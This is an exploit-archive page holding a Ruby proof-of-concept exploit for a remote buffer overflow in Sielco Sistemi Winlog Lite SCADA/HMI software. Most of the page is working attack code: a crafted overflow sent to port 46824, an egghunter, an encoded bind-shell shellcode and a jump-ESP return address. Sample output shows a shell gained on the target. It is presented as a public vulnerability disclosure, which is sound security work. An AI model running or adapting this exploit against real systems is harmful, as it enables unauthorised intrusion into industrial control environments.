[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Sielco Sistemi Winlog <= 2.07.16 Buffer Overflow
# Published : 2012-06-05
# Author :
# Previous Title : Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow
# Next Title : Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability


#!/usr/bin/ruby

# Exploit Title: Sielco Sistemi Winlog Buffer Overflow <= v2.07.16
# Date: 05.06.2012
# Exploit Author: m1k3
# Vendor Homepage: http://www.sielcosistemi.com/en/download/public/winlog_lite.html
# Software Link: http://www.sielcosistemi.com/en/download/public/winlog_lite.html
# Version: 2.07.14
# Tested on: Windows XP SP2

#---------------------------------------------
#
# Sielco Sistemi Winlog Buffer Overflow <= v2.07.16
# - Buffer overflow vulnerability
# Date: 05.06.2012
#
# ---------------------------------------------
#
# - Description
# Winlog Lite is the entry level version of the SCADA/HMI software Winlog Pro offered by Sielco Sistemi to allow an evaluation of the potentiality and the simplicity of use of the package; Winlog Lite is also a powerful and low cost solution for creation of small supervisory applications.
# Winlog Lite makes available most of development tools and functions provided by the Winlog Pro software package, but limits the possibility to develop and to run applications up to a max of 24 tags. Winlog Lite does not include Symbol Factory library and web support.
# Source: http://www.sielcosistemi.com/en/download/public/winlog_lite.html
#
# - buffer overflow vulnerability
#
# The vulnerability can be triggered by sending a specially crafted request to port 46824. 
#
# - Solution
#
# No known solution available. Filter access to port 46824.
#
# - Credits
#
# The vulnerability was discovered by m1k3 (@s3cur1ty_de)
#  - devnull#at#s3cur1ty#dot#de
#  - http://www.s3cur1ty.de
#
# Thx to @corelanc0d3r and @offsectraining for their great work :)
#
# - Timeline
#
# 04.06.2012 - Vulnerability discovered
# 05.06.2012 - Public disclosure
#
# - Reference
#
# Download vulnerable software: http://www.sielcosistemi.com/en/download/public/winlog_lite.html
# Offensive Security Training: http://www.offensive-security.com/
# Corelan Training: https://www.corelan-training.com/

# - Exploit:

#root@bt:~/msf-scripts# ruby runtime-exploit-01.rb
#placing the shellcode
#sleeping ...
#kicking ...
#buffer length: 261
#root@bt:~/msf-scripts# netcat -v 10.8.28.37 4444
#10.8.28.37: inverse host lookup failed: Unknown server error : Connection timed out
#(UNKNOWN) [10.8.28.37] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:Documents and SettingsAll UsersApplication DataWinlog LiteProjectsCeramics KilnTemplate>
#
# Important:
# -> the reliability of your exploit depends on that path ...
# if you choose another default project or you start another project this path ist not reliable anymore 
# you can choose the default project on the installation. I have used Ceramics Kiln

require 'socket'

port = "46824"
host = "10.8.28.37"

s = TCPSocket.open(host,port)

sleep(0.5)

egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
egghunter << "xefxb8x77x6fx6fx74x8bxfaxafx75xeaxafx75xe7xffxe7"

# msfpayload windows/shell_bind_tcp R | msfencode -t ruby
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode =
"xdbxc8xd9x74x24xf4x5bxbax45x76x08xf1x33xc9" +
"xb1x56x31x53x18x83xebxfcx03x53x51x94xfdx0d" +
"xb1xd1xfexedx41x82x77x08x70x90xecx58x20x24" +
"x66x0cxc8xcfx2axa5x5bxbdxe2xcaxecx08xd5xe5" +
"xedxbcxd9xaax2dxdexa5xb0x61x00x97x7ax74x41" +
"xd0x67x76x13x89xecx24x84xbexb1xf4xa5x10xbe" +
"x44xdex15x01x30x54x17x52xe8xe3x5fx4ax83xac" +
"x7fx6bx40xafxbcx22xedx04x36xb5x27x55xb7x87" +
"x07x3ax86x27x8ax42xcex80x74x31x24xf3x09x42" +
"xffx89xd5xc7xe2x2ax9ex70xc7xcbx73xe6x8cxc0" +
"x38x6cxcaxc4xbfxa1x60xf0x34x44xa7x70x0ex63" +
"x63xd8xd5x0ax32x84xb8x33x24x60x65x96x2ex83" +
"x72xa0x6cxccxb7x9fx8ex0cxdfxa8xfdx3ex40x03" +
"x6ax73x09x8dx6dx74x20x69xe1x8bxcax8ax2bx48" +
"x9exdax43x79x9exb0x93x86x4bx16xc4x28x23xd7" +
"xb4x88x93xbfxdex06xccxa0xe0xccx7bxe7x2ex34" +
"x28x80x52xcaxdfx0cxdax2cxb5xbcx8axe7x21x7f" +
"xe9x3fxd6x80xdbx13x4fx17x53x7ax57x18x64xa8" +
"xf4xb5xccx3bx8exd5xc8x5ax91xf3x78x14xaax94" +
"xf3x48x79x04x03x41xe9xa5x96x0exe9xa0x8ax98" +
"xbexe5x7dxd1x2ax18x27x4bx48xe1xb1xb4xc8x3e" +
"x02x3axd1xb3x3ex18xc1x0dxbex24xb5xc1xe9xf2" +
"x63xa4x43xb5xddx7ex3fx1fx89x07x73xa0xcfx07" +
"x5ex56x2fxb9x37x2fx50x76xd0xa7x29x6ax40x47" +
"xe0x2ex70x02xa8x07x19xcbx39x1ax44xecx94x59" +
"x71x6fx1cx22x86x6fx55x27xc2x37x86x55x5bxd2" +
"xa8xcax5cxf7"

puts "placing the shellcode"
buffer = "x41" * 2000
buffer << "wootwoot" #egg
buffer << "x90"
buffer << shellcode
buffer << "x90" * 2000
print "buffer length: #{buffer.length}rn"
s.puts(buffer)

puts "sleeping ..."
sleep(5)

puts "kicking ..."
buffer = "x41" * 20 + "x14" * 10 + "x41" * 167
buffer << "xdfx53x51x40" #EIP -> Jmp ESP - Vclx40.bpl - 0x405153df
buffer << "x90" 
buffer << egghunter
buffer << "x90" * (59 - egghunter.length)
print "buffer length: #{buffer.length}rn"
s.puts(buffer)